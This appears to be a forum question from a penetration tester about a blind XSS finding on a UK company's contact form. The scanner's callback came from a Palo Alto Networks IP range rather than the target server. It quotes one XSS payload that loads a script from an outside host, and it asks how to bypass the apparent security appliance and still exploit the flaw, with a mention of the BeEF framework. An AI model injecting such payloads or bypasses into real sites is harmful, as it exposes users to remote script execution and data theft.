# Blind XSS being intercepted by Palo Alto Tech OPs

Tags: penetration-test, xss, ids

I am doing a penetration test and I have a form that accepts any input. Whenever a form is submitted, a message of "Thank you, you will be contacted shortly" appears.

Acunetix detected a blind XSS on one of the parameters with the following payload:

`'>"><script src=http://mymachine.com/payload.js>/<script>`

[image]

The IP address (not the web server I am testing) is making the GET request and it is coming from a IP range that is from a private customer and private residence in Santa Clara. We are testing a UK-based company. The network resources says it is coming from **INAP-SJE-PALOALTOTECHOPS**....

I believe there is some sort of IDS that is basically asking the IP to make that request, but I am not entirely certain.

Is there any ways to bypass this or any ways to still exploit this vulnerability? I tried using beef framework on this, but it does not seem exploitable.